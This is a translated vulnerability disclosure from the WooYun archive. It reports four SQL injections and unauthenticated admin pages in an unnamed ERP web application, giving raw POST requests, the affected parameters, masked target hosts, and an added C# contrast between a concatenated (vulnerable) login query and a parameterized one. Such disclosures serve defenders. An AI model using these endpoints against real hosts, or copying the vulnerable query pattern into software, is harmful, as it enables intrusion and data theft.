WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online viewer -------- http://drop.zone.ci/
2015-10-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed to the public.
2015-11-24: The vendor has proactively ignored the vulnerability; details are disclosed to the public.
As the title says.
Issues found: 4 SQL injections and multiple authorization bypasses in the system (none require login). First injection:
POST /login.aspx HTTP/1.1
Content-Length: 330
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

loginSubmit=&ckbIsSave=on&password=g00dPa%24%24w0rD&randomData=&signedData=&txt_verify=g00dPa%24%24w0rD&username=admin&__VIEWSTATE=/wEPDwUKLTg1Mjc0MDQzNmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWNrYklzU2F2ZWvEIdmbjPScY/cv4tJUXwzvI4cqqgA7uf89XFgMLZrY&__VIEWSTATEGENERATOR=C2EE9ABB
Injected parameter: username. Second injection:
POST /admin/glassmanager.aspx?ModelType=edit&page=1&PID=40 HTTP/1.1
Content-Length: 742
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

btnSearch=%e6%9f%a5%e8%af%a2&hidGrainID=40&txtGlasscode=%e5%8d%95%e9%9d%a2%e6%9c%a8%e6%a0%bc%e4%b8%80%e9%9d%a2%e7%99%bd%e7%8e%bb%e4%b8%80%e9%9d%a2%e5%b8%83%e7%ba%b9&txtGlassCodeForSearch=123&txtGlassName=40&txtGlassNameForSearch=ocljxusc&txtGlassprice=0&__EVENTVALIDATION=/wEdAAnKjHjs2vZ0ShC9zkxI0y4pW4pIN1KIEEsGHukofKCPKC8Au989bZBKED75joowesJSc2ZfrrLnksUmxqYJhYUi/f7hXxuj%2b9RdyEo8/nBf7eFPbBA2nrvZZ4n1DcerbfyIoPAi2xR6UPghNedlm6QFjtTdVzRZn7DFyWrI8V/OY2i3LqZOTKDGsjhJxkmxGp3YmfZmy9iDaVXQJLmwxxmBmae%2bTZLodyGOGWayPROPQQ%3d%3d&__VIEWSTATE=/wEPDwUKLTg4ODI0MDA4MQ9kFgICAw9kFgICAw8PFgIeBFRleHQFBuabtOaWsGRkZKbZg3eBuE8TxE7glDEEswRszq1lBWF0%2bHnGfQYZ%2bfAE&__VIEWSTATEGENERATOR=61268597
Injected parameters: txtGlassNameForSearch and txtGlassCodeForSearch. Third injection:
POST /admin/function/functionmanage.aspx HTTP/1.1
Content-Length: 553
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

ButAddFunction=%e6%b7%bb%e5%8a%a0&hidFunctionID=&TextFunctioncode=1&TextFunctionName=qeksviyy&TextFunctionpath=1&__EVENTVALIDATION=/wEdAAYwN3zyZaSJTHn8Ah/SC99I%2bLDo9dAznYnoFSF/78GxrPudp1MFazkgrxYIHSRoS4WM6vkbVh5TFLI8yCGtM2QBufd%2b2kIoS6kOXl%2blwxtK1NN8MV13sGeMpCG0koNNyNDuphDsjuVlO1wXx3SFbjr/Lks0UBPjPRPDSa8BVmo8Cw%3d%3d&__VIEWSTATE=/wEPDwUKLTE0NTk4NzI2MQ9kFgICAw9kFgYCBw8PFgIeB1Zpc2libGVoZGQCCQ8PFgIfAGhkZAINDxYCHgtfIUl0ZW1Db3VudGZkZPipjuIJPjUXAvu9jJCh2U3OEQzJDlv5sIyr/YQ7vkQn&__VIEWSTATEGENERATOR=4F298C76
Injected parameter: TextFunctioncode. Fourth injection:
POST /admin/colormanager.aspx?page=2 HTTP/1.1
Content-Length: 458
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

BtnSeasrch=%e6%9f%a5%e8%af%a2&hidGrainID=0&txtCode=1&txtName=imjtmjdm&__EVENTVALIDATION=/wEdAAaOTLJrE1GkP3p9NL%2bgg%2blJozoJZpuXxkpOVJKRbHyuHoVrfPTZCZCdgWOPfArF%2bOv9/uFfG6P71F3ISjz%2bcF/tZRy0t362Wd2hZI98BfBb/2i3LqZOTKDGsjhJxkmxGp2NkRG0i6Gt/nSjTU0ov%2bJK4bHomrKhYXFOuwfglto8CA%3d%3d&__VIEWSTATE=/wEPDwUKMTk4MzU1NTA4NWRkglpP/rm817U8YnqbLrVrtnV9Fpc/WrQXbpNXW35owQM%3d&__VIEWSTATEGENERATOR=C550A4E8
Injected parameters: txtCode and txtName. Multiple authorization bypasses in the system (admin pages reachable without logging in):
/admin/colormanager.aspx
/admin/cad/cadmodelrelation.aspx
/admin/cad/cadbaserelationship.aspx
/admin/flash/resourcemanager.aspx
/admin/flash/scenecatatorymanager2.aspx
/admin/flashmanage.aspx
Not every one is listed here.
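The two defect classes the report describes, as an added illustration in ASP.NET WebForms C#; this is not code from the reported application (its source is not on the page) and was not written by the reporter. The connection string, the Users table and its columns, the role name "Admin" and the class names are assumptions. The first class shows the login query in the string-concatenated form that lets a POST parameter such as username become SQL, beside the parameterized form; the second shows a page base class that refuses unauthenticated requests to admin pages before any of the page's own search or add handlers run.

```csharp
// Added illustration, not the reported application's code. Everything below that
// names a table, column, connection string or role is an assumption.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class Login : Page
{
    // Assumed connection string; not from the report.
    private const string ConnStr =
        "Server=.;Database=ErpAssumed;Integrated Security=true";

    // VULNERABLE pattern consistent with the report: the username field is
    // concatenated into the statement, so whatever it contains is parsed as SQL.
    private static bool CheckLoginUnsafe(string username, string password)
    {
        string sql = "SELECT COUNT(*) FROM Users WHERE username='" + username +
                     "' AND password='" + password + "'";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // HARDENED: values are bound as typed parameters and never reach the SQL parser.
    // (Passwords should also be stored as salted hashes, not compared in SQL; the
    // plain comparison is kept only so the contrast with the unsafe form stays small.)
    private static bool CheckLoginSafe(string username, string password)
    {
        const string sql = "SELECT COUNT(*) FROM Users WHERE username=@u AND password=@p";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@u", SqlDbType.NVarChar, 64).Value = username;
            cmd.Parameters.Add("@p", SqlDbType.NVarChar, 128).Value = password;
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }
}

// Pages under /admin/ (colormanager.aspx, flashmanage.aspx, ...) derive from this
// base instead of Page. OnInit runs before the page's own event handlers, so a
// request that is not authenticated, or not in the assumed "Admin" role, is
// rejected before any search or add logic executes.
public class AdminPageBase : Page
{
    protected override void OnInit(EventArgs e)
    {
        base.OnInit(e);
        var user = Context.User;
        if (user == null || !user.Identity.IsAuthenticated || !user.IsInRole("Admin"))
        {
            Response.StatusCode = 403;
            Response.End();
        }
    }
}
```

The base-class check is the code-level form of the control; the same requirement can additionally be enforced in web.config with a `<location path="admin">` element whose `<authorization>` denies anonymous users (`<deny users="?" />`), so that a page which forgets to inherit from the base class is still covered. For the injection class, the practical check during review is to search the code base for string concatenation into `SqlCommand` text and confirm every request parameter named in this report (username, txtGlassNameForSearch, txtGlassCodeForSearch, TextFunctioncode, txtCode, txtName) only ever reaches the database as a bound parameter.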
4 SQL injections:
Multiple unauthorized accesses in the system:
Cases:
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:8088/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
Vendor contact
Unable to reach the vendor, or the vendor actively refused.